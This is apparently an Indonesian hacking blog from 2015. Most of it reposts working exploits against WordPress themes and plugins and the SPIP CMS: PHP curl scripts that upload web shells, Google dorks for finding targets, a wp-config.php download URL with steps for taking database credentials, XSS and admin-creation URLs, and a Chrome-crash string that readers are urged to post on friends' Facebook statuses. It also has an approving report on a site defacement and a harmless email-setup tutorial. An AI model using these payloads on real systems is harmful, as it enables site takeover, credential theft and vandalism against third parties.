Halaman

Wordpress Salespresspro Theme File Upload Vulnerability

Sabtu, 26 September 2015
#-Title: Wordpress Salespresspro Theme File Upload Vulnerability
#-Author: unknown
#-Date: 18/01/2015
#- Vendor : Mark Dulisse
#- Link Download : sites.google.com/site/getsalespresspro20get/
#-Google Dork: inurl:wp-content/themes/Salespresspro
#- Tested on : Windows 7
#- Fixed in v2.0
==========================================================================

Proof Of Concept :

http://site.com/wp-content/themes/salespresspro/headerimgbgblog-upload.php  

Upload Shell > Buka di tab baru / lewat inspect elemen

Patch :

 baru / Simply cuman rename headerimgbgblog-upload.php jadi headerimgbgblog-upload.txt
Read more ...

Wordpress Themes U-Design Multiple Vulnerabilty

Rabu, 23 September 2015



#-Title: Wordpress Themes U-Design Multiple Vulnerabilty
#-Author: Tn_Scorpion
#-Date: 18/01/2015
#- Vendor : Themeforest
#- by : andondesign
#- Link Download : themeforest.net/item/udesign-responsive-wordpress-theme/253220
#-Google Dork: inurl:wp-content/themes/u-design
#- Tested on : Windows 8
--------------------------------------------------------
Multiple Vulnerabilty

Kenapa ? karena themes ini mempunyai dua bug sebenernya, tapi yang tenar cuma File uplod vulnerabilitynya doang :'v sebenernya ada ada lagi yaitu Arbitrary File Download Vulnerability. ok cukup ~

Proof Of Concept :

--
File uplod vulnerability 
--

<?php

$uploadfile="3xploi7.php";

$ch = curl_init("http://3xploi7.id/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php");

curl_setopt($ch, CURLOPT_POST, true);

curl_setopt($ch, CURLOPT_POSTFIELDS,

              array('Filedata'=>"@$uploadfile",

              'folder'=>'/wp-content/themes/u-design/scripts/admin/uploadify/'));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);

curl_close($ch);



  print "$postResult";

?>

Result : Here !
--
File Download Vulnerability
--

http://3xploi7.id/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

1. Download Confignya
2. Buka dan cari user pw dbnya
3. login di web.com/phpmyadmin
4. terserah anda.

Read more ...

Situs Toyota Kembali Di Hack !

Selasa, 22 September 2015



Sebuah Kelompok hacker kembali menyerang situs Indonesia, dan kali ini korbannya adalah situs resmi Toyota Indonesia.

Ketika kami mencoba membuka situs Toyota Indonesia yang beralamat do www.toyota.astra.co.id, laman yang biasanya menampilkan index yang berisi daftar produk-produk terbaru Toyota tersebut berubah dan hanya terlihat background 'hijau'akibat aksi 'defacing'. Di bagian bawah tampilan, terdapat tulisan bila situs tersebut dihack oleh seseorang yang bernick UnknownYmouz.

Dilihat Secara keseluruhan, yang bisa dilihat netizen hanya beberapa tulisan saja, seperti 'Indonesian Code Party'. Di laman itu sepertinya juga ada sebuah gambar dan video yang ingin ditampilkan oleh si hacker, tetapi tidak muncul.

Setelah ditelusuri oleh tim kami, aksi deface yang mengarah ke situs Toyota itu hanya terjadi dibagian 'Homepage' website saja. Sementara, bagian situs lain seperti 'News&Promo' bisa diakses seperti normal.

Namun, beberapa tautan di dalam situs Toyota Indonesia itu berhasil ganti. Misalnya, saat artikel "tips" di situs dibuka, maka akan terlihat jendela kosong dengan bertulisan 'f*ck' di bagian atas.

Sampai saat ini, belum ada pernyataan resmi dari pihak Toyota Indonesia akan kasus peretasan UnknownYmouz. Situs Toyota Indonesia pun masih belum bisa diakses dengan normal sanoau saat ini (22/09/2015 19:19:59) . Namun, situs toyota.com tidak terkena masalah defacing ini. mungkin toyota.com di chmood supaya tidak bisa dirubah. situs toyota sebelumnya juga pernah di deface oleh GantengersCrew & ./MrJ

* Setelah ditelusuri oleh kami, website tersebut mempunyai bug fpumd uploader yang bisa digunakan untuk mengupload sesuatu tetapi tidak secure oleh pihak admin, jadi bisa ke upload shell atau backdoor

Berikut daftar situs yang di deface :


Aksi tersebut disimpan dengan mirror zone=h sebagai berikut :




Read more ...

Bug String Pembuat Google Chrome CRASH !

Senin, 21 September 2015


Hallo Gan/Sis pasti udah pada tau dong tentang Google Chrome ? ya sebuah browser yang di kembangkan oleh Google Developer yang pada saat ini sedang naik daun *asekk .. ya popularitas Google Chrome sudah tak diragukan lagi hampir "mengalahkan" mozilla firefox. lanjut gak usah banyak cingcong, ternyata Browser secanggih Google Chrome pun masih mempunya bug sederhana, bug itu hanyalah sebuah string.


Bug ditemukan oleh Andris Atteka, yang menjelaskan di blog-nya bahwa Anda dapat dengan mudah membuat crash Google Chrome hanya dengan menambahkan karakter null dalam string URL. Contoh nya adalah 26 karakter, tapi kami telah berhasil mensederhanakan habis sehingga tersisa 10 karakter untuk menghasilkan string yang lebih sederhana yang akan membuat crash Google Chrome.

"Baru saja saya melaporkan bug kecelakaan di Google Chrome (issue # 533361). Masalah ini mengingatkan saya pada kerentanan Skype baru-baru ini - keduanya terjadi dengan string URL sederhana. Jadi bagaimana Anda dapat crash Google Chrome? Dengan menambahkan char NULL dalam string URL" Kata Andris Attekadi Blognya 

Dari temuan bug Google Chrome itu, Andris Atteka tidak mendapat reward / hadiah apapun dari Google. Pihak Google beranggapan Bug ini dianggap hanya kerentanan DOS saja. 

"Sayangnya tidak ada reward dianugerahi seperti ini dianggap hanya kerentanan DOS. Pokoknya, membuat perangkat lunak yang aman adalah jauh lebih sulit daripada menemukan masalah di dalamnya. terima kasih Google" Kata Andris Attekadi Blognya 

Jika bug ini terlihat akan membuat google chrome menjadi seperti ini  :

Btw Tapi dari tadi belom di kasih tau ya contoh bugnya seperti apa ?? :D

* Peringatan 

Untuk menguji bug ini saat ini juga agan / sis harus prepare dulu, save document di google chrome agar data tidak hilang. karena nanti bug ini akan membuat crash page .

ini dia ...  
1. coba agan buka facebook 
2. Komen string ini di status temen agan

http://facebook.com/%%30%30

3. arahkan kursor ke string tersebut yang sudah di komen.
4. nanti google chrome agan akan " Aw, Snap ! "

Selamat mencoba :)


Read more ...

Wordpress Plugin Wp-checkout Multiple Vulnerabilitie

Senin, 21 September 2015




#- Title : Wordpress Plugin wp-checkout XSS & Arbitrary File Upload
#- Author : DevilScreaM & Gastro-dz
#- Vendor : wordpress.org/extend/plugins/wordpress-checkout/
#- Date : 09/21/2015
#- Category : Web Applications
#- Type : PHP
#- Vulnerabillity : Arbitrary File Upload, XSS
#- Dork : inurl:wp-content/plugins/wp-checkout
#- Tested on : Vivid Vervet
---------------------------------------------------------------------------------

Proof Of Concept :


[ Cross Site Scripting ] Discover by DevilScreaM

http://site-target/wp-content/plugins/wp-checkout/vendors/timthumb.php?src=[XSS]

Example :
http://Site.com/wp-content/plugins/wp-checkout/vendors/timthumb.php?src=<h1>3xploi7</h1>

http://site.net/wp-content/plugins/wp-checkout/vendors/timthumb.php?src=<h1>3xploi7</h1>


Solution :
Upgrade Version of Timthumb or Delete Files timthumb.php

----------------------------------------------------------------------------
[ Arbitrary File Upload ] Discover by DevilScreaM

Vulnerability :

 http://site.com/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php ( Discover by DevilScreaM)

<?php

$uploadfile="3xploi7.php";
$ch = curl_init("http://site-target/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('Filedata'=>"@$uploadfile",
          'folder'=>'/wp-content/uploads/wp-checkout/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>



Result : Here

----------------------------------------------------------------------------



[ Uploadify ] Discover by Gastro-dz



Vulnerability :

http://site.com/wp-content/uploads/wp-checkout/uploadify/upload.php

<?php


$uploadfile="3xploi7.php";
$ch = curl_init("http://site.com/wp-content/uploads/wp-checkout/uploadify/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('Filedata'=>"@$uploadfile",
          'folder'=>'/wp-content/uploads/wp-checkout/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>


Result Here


Read more ...

Tutorial Konfigurasi POP Outlook dengan Gmail

Sabtu, 19 September 2015

Assalamualaikum Wr. Wb.
Kali ini saya akan menshare tutorial bagaimana cara menseting pop3 outlook dengan Gmail.  kamu bisa menkonfigur akun gmail kamu secara mudah dengan metode auto configure dari Mircrosoft Outllok 2007 dan Microsoft Outlook 2010. Tapi kamu perlu mensetting akun gmail untuk memperbolehkan kamu untuk mendownload email sebagai POP atau untuk Folder mad dan email menggunakan IMAP. Mari kita ikuti langkah langkah mengkonfigurasi Microsoft Outlook untuk Gmail.

Mensetting Gmail untuk Connect dengan Microsoft Outlook


Setting POP di Outlook :

1. Masuk ke Akun Outlook Anda
2. Klik di ikon setting dan pilih Options
3. Dibagian Managing You Account, Klik Connect devices and apps with POP
4. Pilih Enable dan pilih Don't let devices or apps delete messages from Outlook.com blablabla
5. Klik Save

Setting di Gmail :

1. Masuk ke Akun gmail Anda  
2. Klik di ikon setting dan pilih setting
3. Klik di "Forwarding and POP/IMAP" di Tab ke-5
4. Lihat di bagian POP Download, dan pilihlah  Enable POP for all mail that arrives from now on
5. Pilih When Messages Are Accessed With POP dan pilih Archive Gmail�s Copy
6. Terakhir tinggal klik save

Langkah Terakhir :

1. Masuk ke Akun Outlook Anda
2. Klik di ikon setting dan pilih Options
3. Pilih Import Email Accounts
4. lalu Pilih Gmail
5. Lalu ikuti saja klik ok ok
6. Sampai muncul seperti ini


 7. Jika muncul seperti diatas berarti anda berhasil . selamat :D 

Read more ...

SPIP CMS - Add User Administrator

Sabtu, 19 September 2015



#- Exploit Title: SPIP CMS - Add User Administrator
#- Author: Gregory Draperi
#- Date: 04/30/2014
#- Flaw finder : Unknown
#- Email: Gregory.draperi@gmail.com
#- Vendor Homepage: www.spip.net
#- Software Link: files.spip.org/spip/archives/
#- Version : SPIP < 3.0.9 / 2.1.22 / 2.0.23
#- Tested on: Windows 7 - SPIP 2.2.22
#- CVE : CVE-2013-2118
-----------------------------------------------------------------------------
Vulnerability :

Kerentanan ini memungkinkan seseorang untuk membuat account administrator pada CMS tanpa dikonfirmasi.
Untuk mengatasi, konfigurasi SMTP harus dikonfigurasi pada SPIP CMS karena verivy password dikirim melalui pos.

Proof Of Concept :

http://3xploi7.com/spip.php?page=identifiants&mode=0minirezo


Cara :
1. Jika vuln, kamu akan menerima bot email dari web tersebut. kamu harus klik link verivikasi ( jika muncul ) agar bisa masuk
2. Setelah kamu verivykasi datanya, kamu tinggal login .
web.com/ecrire
3. Jika berhasil, kamu klik salah satu post dan kamu edit, scroll kebawah sampai menemukan uploader ( intinya : temuin uploader )
4. kamu upload file html / gif / jpg / txt
5. Setelah berhasil diupload kamu tinggal klik kanan open in new tab 

Atau bisa cari berdasarkan extension, Contoh : 

web.com/IMG/html/filemu.html
web.com/IMG/gif/filemu.gif
web.com/IMG/txt/filemu.txt

Dan seterusnya 

Vulnerability Fixed in > V.3.0.9
Read more ...

WordPress QaEngine Theme - Add Administrator

Jumat, 18 September 2015



#- Title: WordPress QaEngine Theme - Add Administrator
#- Author: A. Samman
#- URL : research.evex.pw/?vuln=10
#- Date: 04/06/2015
#- Vendor: enginethemes.com
#- Download Link: enginethemes.com/themes/qaengine/
#- References :
#- OSVDB : 121267 
#- PACKETSTORM : 131648
#- WPVDB ID : 7885
#- Description : QAEngine vulnerability allows an attacker to have an administrator account on the target's website.

--------------------------------------------------------------------------------------
Proof of Concept :

http://www.example.com/wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=xADMIN&user_pass=xPASS&role=administrator

Response : {"success":true,"data":{"action":"ae-sync-user","user_login":"xADMIN","user_pass":"xPASS","role":"administrator","ID":5},"msg":"Update
user successful!"}



Read more ...

WordPress ThisWay Arbitrary File Upload

Kamis, 17 September 2015


#- Title: WordPress ThisWay Arbitrary File Upload
#- Author: Bet0
#- Date: 11/01/2013  
#- Vendor: themeforest.net
#- Download Link: www.mafiashare.net/download/themeforest-this-way-v12-wp-full-video-image-background/
#- Tested on : Windows 7

Proof of Concept :

<?php
$uploadfile="3xploi7.php";
$ch = curl_init("http://3xploi7.blogspot.com/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

Result : Here


Read more ...

Wordpress Plugin mailcwp v1.99 Remote file upload

Kamis, 17 September 2015

#- Title : Wordpress Plugin mailcwp v1.99 Remote file upload
#- Author : Larry W. Cashdollar, @_larry0
#- Vendor : vCadreWorks Pty Ltd
#- Download Site: wordpress.org/plugins/mailcwp/
#- Tested on : ubuntu
#- Date : 09/17/2015

Vulnerability :

2 $message_id = $_REQUEST["message_id"]; 
3 $upload_dir = $_REQUEST["upload_dir"];
.
8 $fileName = $_FILES["file"]["name"];
9 move_uploaded_file($_FILES["file"]["tmp_name"], "$upload_dir/$message_id-$fileName");

Proof of Concept : 

<?php
/*Larry W. Cashdollar @_larry0
Exploit for mailcwp v1.99 shell will be called 1-shell.php.
7/9/2015
*/
        $target_url = 'http://www.example.com/wp-content/plugins/mailcwp/mailcwp-upload.php?message_id=1&upload_dir=/usr/share/wordpress/wp-content/uploads';
        $file_name_with_full_path = '/var/www/shell.php';
 
        echo "POST to $target_url $file_name_with_full_path";
        $post = array('file' => 'shell.php','file'=>'@'.$file_name_with_full_path);
 
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL,$target_url);
        curl_setopt($ch, CURLOPT_POST,1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
        $result=curl_exec ($ch);
        curl_close ($ch);
        echo "<hr>";
        echo $result;
        echo "<hr>";
?>

*  Fixed in v1.110

Read more ...